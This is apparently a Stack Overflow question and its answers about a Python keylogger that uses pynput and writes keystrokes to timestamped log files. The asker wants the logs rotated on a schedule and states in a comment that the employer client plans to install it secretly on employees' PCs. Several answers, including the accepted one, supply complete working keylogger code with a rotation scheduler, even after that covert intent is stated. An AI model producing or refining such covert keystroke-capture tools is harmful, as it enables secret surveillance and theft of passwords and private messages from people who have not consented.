# How to automatically save text file after specific time in python?

Tags: python, keylogger

This is my keylogger code:

```
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time

start = time.time()

now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]

def on_press(key):
    keys.append(key)
    write_file(keys)
    try:
        print(key.char)
    except AttributeError:
        print(key)

def write_file(keys):
    with open ('log-'+str(dt)+'.txt','w') as f:
        for key in keys:
            # end=time.time()
            # tot_time=end-start
            k=str(key).replace("'","")
            f.write(k.replace("Key.space", ' ').replace("Key.enter", '\n'))
            # if tot_time>5.0:
            #     f.close()
            # else:
            #     continue

with Listener(on_press=on_press) as listener:
    listener.join()
```

In write_file() function, I've used the close method and also the timer which should automatically save the file after 5 seconds, but that gives me a long 1 paged error whose last line says:

```
ValueError: I/O operation on closed file.
```

How do I make my program save the txt file after every 5 seconds and create a new txt file automatically?

NOTE: I actually want the log file to be generated automatically after every 4 hours so that it is not flooded with uncountable words. I've just taken 5 seconds as an example.

Comment: Why do you need to close so often?

Comment: What's the error you got?

Comment: @user3435121 I actually want the log file to be generated automatically after every 4 hours so that it is not flooded with uncountable words. I've just taken 5 seconds as an example. And I get a long 1 paged error whose last line says:

ValueError: I/O operation on closed file.

Answer (score 0, accepted):

You may have to customize the first line.

```
schedule = [ '08:00:00', '12:00:00', '16:00:00', '20:00:00'] # schedule for close/open file (must ascend)

import pynput
from pynput.keyboard import Listener

def on_press(key):
    txt = key.char if hasattr( key, 'char') else ( '<'+key._name_+'>')
    
    # do some conversions and concatenate to line
    if txt == '<space>': txt = ' '
    if txt == None:      txt = '<?key?>' # some keyboards may generate unknown codes for Multimedia
    glo.line += txt

    if (len(glo.line) > 50) or (txt=='<enter>'):
        writeFile( glo.fh, glo.line+'\n')
        glo.line = ''
    
def writeFile( fh, txt):
    fh.write( txt)

def openFile():
    from datetime import datetime
    dt=datetime.now().strftime('%d%m%Y-%H%M%S')
    fh = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)
    return fh

def closeFile( fh):
    fh.close()

def closeAndReOpen( fh, line):
    if len( line) > 0:
        writeFile( fh, line+'\n')
    closeFile( fh)
    fh = openFile()
    return fh
  
class Ticker():
    def __init__( self, sched=None, func=None, parm=None):
        # 2 modes: if func is supplied, tick() will not return. Everything will be internal.
        #          if func is not supplied, it's non-blocking. The callback and sleep must be external.
        self.target = None
        self.sched = sched
        self.func = func
        self.parm = parm
  
    def selectTarget( self):
        for tim in self.sched: # select next target time (they are in ascending order)
            if tim > self.actual:
                self.target = tim
                break
        else: self.target = self.sched[0]
        self.today = (self.actual < self.target) # True if target is today.

    def tick( self):
        from datetime import datetime
        while True:
            self.actual = datetime.now().strftime( "%H:%M:%S")
            if not self.target: self.selectTarget()
            if self.actual < self.target: self.today = True
            act = (self.actual >= self.target) and self.today # True if target reached
            if act: self.target = '' # next tick will select a new target
            if not self.func: break  # Non-blocking mode: upper level will sleep and call func
            # The following statements are only executed in blocking mode
            if act: self.func( self.parm)
            time.sleep(1)
              
        return act # will return only if func is not defined
    
class Glo:
   pass

glo = Glo()
glo.fh = None
glo.line = ''
glo.fini = False

glo.fh = openFile()
listener = Listener( on_press=on_press)
listener.start()
ticker = Ticker( sched=schedule) # start ticker in non-blocking mode.

while not glo.fini:
    import time
    time.sleep(1)
    if ticker.tick():
        # time to close and reopen
        glo.fh = closeAndReOpen( glo.fh, glo.line)
        glo.line = ''

listener.stop()
writeFile( glo.fh, glo.line+'\n')
closeFile( glo.fh)
exit()
```

If you're satisfied, you may mark the answer as "ACCEPTed".

Answer (score 1):

The most important problem is that you did not reset the timer. After f.close(), end_time should be transferred into start_time.
Also, since you call write() for every event, there is no reason to accumulate into keys[].
Also, you never empty keys[].

Comment: okay so I have now reset the timer and emptied the keys[] inside the loop. But still I see error. And as far as concerned about write(), the program works absolutely fine if I don't include the timer and that close() statement.

Comment: I don't understand what you mean by "... so that it is not flooded with uncountable words".

Comment: Please edit your post to show your update version.

Comment: What I'm trying to say is that I am making this system for my client who's an employer. He wants to install this keylogger secretly in the PCs of all the employees' to see whether they are working properly in the office. And he has asked me to set the time interval as 4 hours bcz a log file consisting of all the keywords someone has typed for 8 hours would be hard to read.

Answer (score 0):

I executed your program and found 2 problems.
The first one is about the start variable. Python use different namespaces for each program or function. Since start was defined at program level, it wasn't known in the function. Commenting out your timer logic was hiding the problem. You can fix the problem with the 'global' statement.
The second one is about "with open". If you use "with open" you must not close the file yourself. If you do, "with open" will not reopen the file.
Here's a working version of your program.

```
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time

start = time.time()

now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]

def on_press(key):
    keys.append(key)
    write_file(keys)
    try:
        print(key.char)
    except AttributeError:
        print(key)

def write_file(keys, f=None):
    global start
    for key in keys:
        k=str(key).replace("'","").replace("Key.space", ' ').replace("Key.enter", '\n')

        if not f:
            f = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)
        f.write( k)

        end=time.time()
        tot_time=end-start
        if tot_time>5.0:
            f.close()
            f = None
            start=end
        else:
            continue
    keys = []

with Listener(on_press=on_press) as listener:
    listener.join()
```

A nicer solution would be move the open/close logic outside the write_file() function.

Comment: Thank you so much for replying. But the problem still persists. New log file isn't being generated after every 5 seconds.

Comment: The file is closed and re-opened. The problem is that it is re-opened with the same filename (I borrowed that from your program). Now I understand you want a different filename. You will have to move the now() and strftime() inside write_file().

Comment: New files are getting created now but there's absolutely no fixed time interval for the creation of new file. I mean some files are created after 2 seconds and some would take 20 seconds.

Comment: Since the logic for automatic  closure is located in write_file(), thast logic will only be executed if there is a keyboard event. If there's no key pressed for 20 minutes, the file will not be closed. If it's important, we can move that logic out of write_file()

Comment: Yes I want the new file to be created after every 4 hours regardless of any keyboard event

Comment: Have you tried the latest version (the one with "ACCEPTed" at the end)? Which one would you like to adapt?

Comment: yes the latest version has the similar problem that there's no fixed interval for file creation. Whenever I press a special key like Alt or Enter, it would create a new file within a second and it keeps happening.